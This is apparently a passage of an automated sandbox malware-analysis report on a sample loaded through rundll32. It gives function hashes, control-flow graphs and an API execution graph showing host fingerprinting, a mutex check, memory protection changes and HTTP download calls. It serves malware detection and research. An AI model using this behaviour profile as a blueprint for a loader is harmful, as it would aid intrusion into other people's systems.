                                                                                                                                                                                                                            Function 0000029F3B7DBE8E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                                            • Opcode ID: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                            • Instruction ID: 7714cd34066bacaeef50d2c06ffe5aca3cef18594e00d5d22bd8fd5bdff33ca1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FB1B63121CB488FDB94EF1CC889BAAB7E1FB98311F50466DE499C7251DB34E845CB92
                                                                                                                                                                                                                            Function 0000029F3B7515E0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 310 29f3b7515e0-29f3b7515fc 311 29f3b7515fe-29f3b751603 310->311 312 29f3b751608-29f3b751617 310->312 313 29f3b751784-29f3b751788 311->313 314 29f3b75168c-29f3b75169b 312->314 315 29f3b751619-29f3b75162a 312->315 316 29f3b75169d-29f3b7516a5 314->316 317 29f3b7516a7 314->317 318 29f3b751682-29f3b751687 315->318 319 29f3b75162c-29f3b751635 315->319 320 29f3b7516af-29f3b7516c6 316->320 317->320 318->313 321 29f3b751664-29f3b75167c VirtualFree 319->321 322 29f3b751637-29f3b75164a 319->322 323 29f3b7516d2 320->323 324 29f3b7516c8-29f3b7516d0 320->324 321->318 322->321 325 29f3b75164c-29f3b751662 322->325 326 29f3b7516da-29f3b7516f1 323->326 324->326 325->318 325->321 327 29f3b7516f3-29f3b7516fb 326->327 328 29f3b7516fd 326->328 329 29f3b751705-29f3b751747 327->329 328->329 330 29f3b751755-29f3b751779 VirtualProtect 329->330 331 29f3b751749-29f3b751751 329->331 332 29f3b75177f 330->332 333 29f3b75177b-29f3b75177d 330->333 331->330 332->313 333->313
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                            • Opcode ID: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                            • Instruction ID: 8da4a63b7b90e5d1fb6f3846650977fd5a92093893c62ed5bf8d6f6b5c0f71a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C51BC76318784C7EB90DB1AE59472AB7A1F3C8B46F050066EA9EC7B54DB7CD940CB04
                                                                                                                                                                                                                            Function 0000029F3B751380 Relevance: 2.6, APIs: 2, Instructions: 119memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                            • Instruction ID: 25e59f6ef61218098323f6b00e4d0635cb53af7e9f88f279cb0720bb1f0eadc4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C51EC76718B8486CBA0DB15E59472AB7A1F7C8BD9F105126EE8E83B68DB3CC540CF04
                                                                                                                                                                                                                            Function 0000029F3B8E8ED0 Relevance: 1.9, APIs: 1, Instructions: 410synchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                            • Instruction ID: 4f3a3cda15305d8e7f2df8fcff4d165067012b667d3fc1fb32fca9d29fb4f661
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E12171408A4D8FE751EF14E895BE6B7F4F768340F20067FE84AC2261DB389245CB86
                                                                                                                                                                                                                            Function 0000029F3B90B4E0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 498 29f3b90b4e0-29f3b90b4ee 499 29f3b90b4f0-29f3b90b505 498->499 500 29f3b90b523-29f3b90b52f 498->500 499->500 502 29f3b90b507-29f3b90b51d call 29f3b904ce0 RtlFreeHeap 499->502 502->500
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                            • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                            • Instruction ID: 0461ee7bc1588e739af02a26735861416afdb6a57617583cd87e0359e5c20d23
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2F03030311A088FFB98E7BAACD877537E2FB9D346F4480A4A405C6294DB7CD841C705
                                                                                                                                                                                                                            Function 0000000273F414D0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 505 273f414d0-273f414dc 506 273f414e0-273f414e7 SleepEx 505->506 506->506
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                            • Opcode ID: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                            • Instruction ID: 0bf00bace8f2674ea540bcf736f3f2282d979a864102f6c7b7d6f84e33ec7844
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06B09B14F04594C7E2255791B44D7699610B74FBD1F249451C55D13755851455425702
                                                                                                                                                                                                                            Function 0000029F3B7511C0 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 507 29f3b7511c0-29f3b7511f0 VirtualAlloc
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                            • Instruction ID: 69e6a8db7854563c547352777915e35218122c34ea3a254b3cfa8abb407f2512
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78D052B2B0868083CB289B20E81060A7B60F388744F904029EA8D83B68CA3EC2128F04

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 0000000273F41740 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: QueryVirtual
                                                                                                                                                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                            • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                            • Opcode ID: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                            • Instruction ID: 663189738c40874af7135dc25b0b982f4eec5aa8fa6ad61ed8319b582aa1f326
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB41AF72F08F4482EB14DB51E8497DA77A0F789BE0F644220DA4D07BA5EB38C685E742
                                                                                                                                                                                                                            Function 0000029F3B7526B0 Relevance: 6.4, APIs: 5, Instructions: 132COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                            • Opcode ID: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                            • Instruction ID: 83e33ab33621e98cd89c4c14678da7dc837745e988a6e748a7efd3b50fa205b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A510C32A18B8486DBE4DB19E55432A77A0F788B85F10046AEB9EC7764DB3CD444CB08
                                                                                                                                                                                                                            Function 0000000273F41010 Relevance: 6.1, APIs: 4, Instructions: 107sleepCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1015461914-0
                                                                                                                                                                                                                            • Opcode ID: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                            • Instruction ID: b36ed253b1f92ff08f278adfa0ead6049e2a2874eebc081211355efa6209b103
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08417C31E0CA4885F765DB1AEC497AA2395B784BE4F744025DE0C87FA1EE28CA40B343
                                                                                                                                                                                                                            Function 0000029F3B751C80 Relevance: 5.2, APIs: 4, Instructions: 177COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4100373531-0
                                                                                                                                                                                                                            • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                            • Instruction ID: 3d679a1340fa1630a6e2a2fc22428c8b25ac778018e1c6034a5559e3e6c657e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C91AF36319B8486DBA0DB09E45436AB7B0F7C8B95F504166EA9E83B64DF3DC484CB04

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:11.9%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:2.8%
                                                                                                                                                                                                                            Total number of Nodes:869
                                                                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                                                                            execution_graph 3480 89d545d 3481 89d5265 3480->3481 3490 89d53a4 3480->3490 3484 89d5315 3481->3484 3485 89d5292 3481->3485 3482 89d5479 3483 89d82b4 NtFreeVirtualMemory 3483->3482 3486 89d532e HttpOpenRequestA 3484->3486 3487 89d52c7 HttpOpenRequestA 3485->3487 3489 89d539c 3486->3489 3487->3489 3489->3490 3491 89d53d6 3489->3491 3492 89d53b3 InternetSetOptionA 3489->3492 3490->3482 3490->3483 3493 89d5424 HttpSendRequestA 3491->3493 3495 89d53e0 3491->3495 3492->3491 3494 89d5443 3493->3494 3494->3490 3498 89d82b4 3494->3498 3497 89d53fb HttpSendRequestA 3495->3497 3497->3494 3499 89d82ef 3498->3499 3500 89d82ce NtFreeVirtualMemory 3498->3500 3499->3490 3500->3499 4420 89db86c 4421 89db880 4420->4421 4424 89db8c6 4420->4424 4422 89db89e VirtualFree 4421->4422 4423 89d82b4 NtFreeVirtualMemory 4422->4423 4423->4424 3501 89d8a58 3502 89d8a72 3501->3502 3503 89d8a79 3501->3503 3503->3502 3504 89d8b63 GetProcAddress GetProcAddressForCaller 3503->3504 3504->3502 4345 89d44b8 4346 89d43c4 129 API calls 4345->4346 4347 89d44c1 4346->4347 4348 89d7528 4349 89d7548 4348->4349 4350 89d754f 4348->4350 4350->4349 4351 89d6fc0 NtAllocateVirtualMemory 4350->4351 4352 89d76a7 4351->4352 4354 89dc734 4352->4354 4355 89dc74f 4354->4355 4357 89dc74a 4354->4357 4356 89db388 NtAllocateVirtualMemory 4355->4356 4356->4357 4357->4349 4358 89d922b 4359 89d904b InternetOpenW 4358->4359 4360 89d9086 4358->4360 4359->4360 4361 89d908b 4359->4361 4362 89d923d InternetCloseHandle 4360->4362 4363 89d9248 4360->4363 4364 89d55dc 3 API calls 4361->4364 4362->4363 4365 89d925b 4363->4365 4366 89d9250 InternetCloseHandle 4363->4366 4367 89d90ca 4364->4367 4366->4365 4367->4360 4368 89d90f4 4367->4368 4369 89dc860 8 API calls 4367->4369 4370 89d9106 4368->4370 4371 89d82b4 NtFreeVirtualMemory 4368->4371 4369->4368 4372 89d9118 InternetOpenUrlW 4370->4372 4373 89d82b4 NtFreeVirtualMemory 4370->4373 4371->4370 4372->4360 4375 89d9154 4372->4375 4373->4372 4374 89d915f InternetReadFile 4374->4375 4375->4360 4375->4374 4376 89db648 3 API calls 4375->4376 4377 89db388 NtAllocateVirtualMemory 4375->4377 4376->4375 4377->4375 4425 89d696b 4450 89d5b7a new[] 4425->4450 4426 89d69a2 GetExitCodeThread 4426->4450 4427 89d69de GetExitCodeThread 4427->4450 4428 89dc704 NtDelayExecution 4428->4450 4429 89d5ba7 4430 89db388 NtAllocateVirtualMemory 4430->4450 4431 89d5484 3 API calls 4431->4450 4432 89dbfc0 NtAllocateVirtualMemory 4432->4450 4433 89d6fc0 NtAllocateVirtualMemory 4433->4450 4434 89d6404 wsprintfA 4434->4450 4435 89d5f36 wsprintfA 4435->4450 4436 89d6025 wsprintfA 4436->4450 4437 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4437->4450 4438 89d8424 11 API calls 4438->4450 4439 89db770 NtAllocateVirtualMemory 4439->4450 4440 89db388 NtAllocateVirtualMemory 4441 89d6187 WideCharToMultiByte 4440->4441 4444 89dbe64 3 API calls 4441->4444 4442 89db388 NtAllocateVirtualMemory 4443 89d6243 WideCharToMultiByte 4442->4443 4446 89dbe64 3 API calls 4443->4446 4444->4450 4445 89db388 NtAllocateVirtualMemory 4447 89d62ff WideCharToMultiByte 4445->4447 4446->4450 4448 89dbe64 3 API calls 4447->4448 4448->4450 4449 89d82b4 NtFreeVirtualMemory 4449->4450 4450->4426 4450->4427 4450->4428 4450->4429 4450->4430 4450->4431 4450->4432 4450->4433 4450->4434 4450->4435 4450->4436 4450->4437 4450->4438 4450->4439 4450->4440 4450->4442 4450->4445 4450->4449 4451 89d4e28 14 API calls 4450->4451 4452 89d8bdc GetCursorPos GetTickCount RtlRandom 4450->4452 4453 89d6cfc NtAllocateVirtualMemory 4450->4453 4454 89d5734 73 API calls 4450->4454 4451->4450 4452->4450 4453->4450 4454->4450 3505 89d43c4 3510 89d41b4 3505->3510 3507 89d43cd 3508 89d43eb 3507->3508 3531 89dc704 NtDelayExecution 3507->3531 3511 89d41d4 3510->3511 3532 89d6cb4 3511->3532 3513 89d41d9 3514 89d41fa GetCurrentProcess IsWow64Process 3513->3514 3523 89d41dd 3513->3523 3515 89d4227 3514->3515 3514->3523 3544 89d7274 GetAdaptersInfo 3515->3544 3517 89d422c 3518 89d4266 CreateMutexW 3517->3518 3517->3523 3519 89d4286 GetLastError 3518->3519 3518->3523 3520 89d42ac GetModuleHandleW 3519->3520 3519->3523 3551 89d4c2c GetModuleHandleW GetCurrentProcessId 3520->3551 3523->3507 3528 89d42ec CreateThread 3529 89d4317 3528->3529 4159 89d43f4 3528->4159 3574 89d6c6c CreateThread 3529->3574 3531->3507 3533 89d6cbd 3532->3533 3534 89d6cf3 3533->3534 3576 89dabe8 3533->3576 3534->3513 3545 89d72ad 3544->3545 3546 89d72d1 3544->3546 3602 89db388 NtAllocateVirtualMemory 3545->3602 3548 89d72df 3546->3548 3549 89d82b4 NtFreeVirtualMemory 3546->3549 3548->3517 3549->3548 3550 89d72b8 GetAdaptersInfo 3550->3546 3604 89d82f4 3551->3604 3555 89d4c7f 3556 89d4d17 GetCurrentProcessId 3555->3556 3558 89d4cf3 3555->3558 3559 89d4d33 3555->3559 3556->3555 3558->3555 3614 89d891c 3558->3614 3560 89d42c1 3559->3560 3561 89d4d44 3559->3561 3560->3523 3563 89d7314 3560->3563 3620 89d4d58 3561->3620 3564 89db388 NtAllocateVirtualMemory 3563->3564 3565 89d732c 3564->3565 3672 89dbfc0 3565->3672 3567 89d737f 3568 89dbfc0 NtAllocateVirtualMemory 3567->3568 3569 89d42d1 3568->3569 3569->3523 3570 89d71f0 3569->3570 3571 89d7208 3570->3571 3572 89dbfc0 NtAllocateVirtualMemory 3571->3572 3573 89d42e1 3572->3573 3573->3523 3573->3528 3575 89d6ca3 3574->3575 3675 89d5a64 3574->3675 3575->3523 3577 89db1c8 3576->3577 3578 89d6ccf 3577->3578 3598 89d8a58 3577->3598 3578->3534 3580 89d99d0 3578->3580 3583 89da82d 3580->3583 3581 89d6cd8 3581->3534 3584 89daa0c 3581->3584 3582 89d8a58 2 API calls 3582->3583 3583->3581 3583->3582 3587 89dab3d 3584->3587 3585 89d6ce1 3585->3534 3588 89d9350 3585->3588 3586 89da8e0 7 API calls 3586->3587 3587->3585 3587->3586 3591 89d9892 3588->3591 3589 89d6cea 3589->3534 3594 89db2a4 3589->3594 3590 89d8a58 GetProcAddress GetProcAddressForCaller 3590->3591 3591->3589 3591->3590 3592 89d9972 3591->3592 3593 89d8a58 2 API calls 3592->3593 3593->3589 3595 89db315 3594->3595 3596 89d8a58 2 API calls 3595->3596 3597 89db372 3595->3597 3596->3595 3597->3534 3599 89d8a72 3598->3599 3600 89d8a79 3598->3600 3599->3577 3600->3599 3601 89d8b63 GetProcAddress GetProcAddressForCaller 3600->3601 3601->3599 3603 89db3c8 3602->3603 3603->3550 3623 89d8c30 3604->3623 3609 89d8d3c 3670 89db470 3609->3670 3612 89d8d6e wsprintfA 3613 89d8d87 3612->3613 3613->3555 3615 89d893a 3614->3615 3616 89d894c RtlGetVersion 3615->3616 3617 89d8957 3615->3617 3616->3617 3618 89d8961 GetVersionExW 3617->3618 3619 89d896c 3617->3619 3618->3619 3619->3558 3621 89d4d66 CloseHandle 3620->3621 3622 89d4d73 3620->3622 3621->3622 3622->3560 3624 89d8c4e 3623->3624 3625 89d8c60 FindFirstVolumeW 3624->3625 3626 89d82fd 3625->3626 3627 89d8c81 GetVolumeInformationW FindVolumeClose 3625->3627 3628 89d8e18 3626->3628 3627->3626 3629 89d8e41 3628->3629 3638 89d8fc8 3629->3638 3632 89d4c73 3632->3609 3633 89db388 NtAllocateVirtualMemory 3634 89d8e63 3633->3634 3635 89d8e91 3634->3635 3643 89dbe64 3634->3643 3636 89d82b4 NtFreeVirtualMemory 3635->3636 3636->3632 3639 89db388 NtAllocateVirtualMemory 3638->3639 3640 89d8fe4 3639->3640 3641 89d8e4b 3640->3641 3647 89d8ec8 3640->3647 3641->3632 3641->3633 3644 89dbe7c 3643->3644 3650 89dbeac 3644->3650 3646 89dbea5 3646->3635 3648 89d8eea 3647->3648 3649 89d8f05 wsprintfA 3648->3649 3649->3641 3653 89db704 3650->3653 3652 89dbedb 3652->3646 3654 89db718 3653->3654 3655 89db733 3653->3655 3657 89d82b4 NtFreeVirtualMemory 3654->3657 3659 89db648 3655->3659 3658 89db725 3657->3658 3658->3652 3660 89db679 3659->3660 3661 89db66f 3659->3661 3664 89db388 NtAllocateVirtualMemory 3660->3664 3666 89db698 3660->3666 3667 89db430 3661->3667 3663 89db6a5 3663->3658 3664->3666 3665 89d82b4 NtFreeVirtualMemory 3665->3663 3666->3663 3666->3665 3668 89db445 VirtualQuery 3667->3668 3669 89db441 3667->3669 3668->3669 3669->3660 3671 89d8d5a GetUserNameA 3670->3671 3671->3612 3671->3613 3673 89db388 NtAllocateVirtualMemory 3672->3673 3674 89dbfdc 3673->3674 3674->3567 3677 89d5aed 3675->3677 3706 89d5b5a new[] 3677->3706 3781 89dc704 NtDelayExecution 3677->3781 3678 89d5ba7 3679 89db388 NtAllocateVirtualMemory 3679->3706 3681 89dc704 NtDelayExecution 3715 89d5c2f new[] 3681->3715 3683 89d82b4 NtFreeVirtualMemory 3683->3706 3684 89dbfc0 NtAllocateVirtualMemory 3684->3715 3685 89d6404 wsprintfA 3685->3715 3686 89d5f36 wsprintfA 3686->3706 3687 89d6025 wsprintfA 3687->3706 3688 89dbfc0 NtAllocateVirtualMemory 3688->3706 3690 89d82b4 NtFreeVirtualMemory 3690->3706 3691 89dbe64 3 API calls 3691->3706 3693 89db388 NtAllocateVirtualMemory 3694 89d6187 WideCharToMultiByte 3693->3694 3697 89dbe64 3 API calls 3694->3697 3695 89db388 NtAllocateVirtualMemory 3696 89d6243 WideCharToMultiByte 3695->3696 3699 89dbe64 3 API calls 3696->3699 3697->3715 3698 89db388 NtAllocateVirtualMemory 3701 89d62ff WideCharToMultiByte 3698->3701 3699->3715 3700 89d6fc0 NtAllocateVirtualMemory 3700->3715 3702 89dbe64 3 API calls 3701->3702 3702->3715 3704 89d82b4 NtFreeVirtualMemory 3704->3706 3705 89d82b4 NtFreeVirtualMemory 3705->3715 3706->3678 3706->3679 3706->3688 3706->3691 3706->3704 3706->3715 3716 89d5484 3706->3716 3727 89d8424 3706->3727 3753 89db770 3706->3753 3761 89d6fc0 3706->3761 3765 89d4e28 3706->3765 3782 89d8bdc 3706->3782 3708 89d8bdc 3 API calls 3708->3715 3709 89d69a2 GetExitCodeThread 3709->3715 3711 89d69de 